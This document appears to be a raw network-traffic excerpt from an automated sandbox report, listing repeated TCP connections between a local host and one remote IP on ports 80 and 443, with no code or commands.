Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.3.255.145:80
Source: global trafficTCP traffic: 192.3.255.145:80 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.3.255.145:80
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.3.255.145:80
Source: global trafficTCP traffic: 192.3.255.145:80 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.3.255.145:80 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.3.255.145:80
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
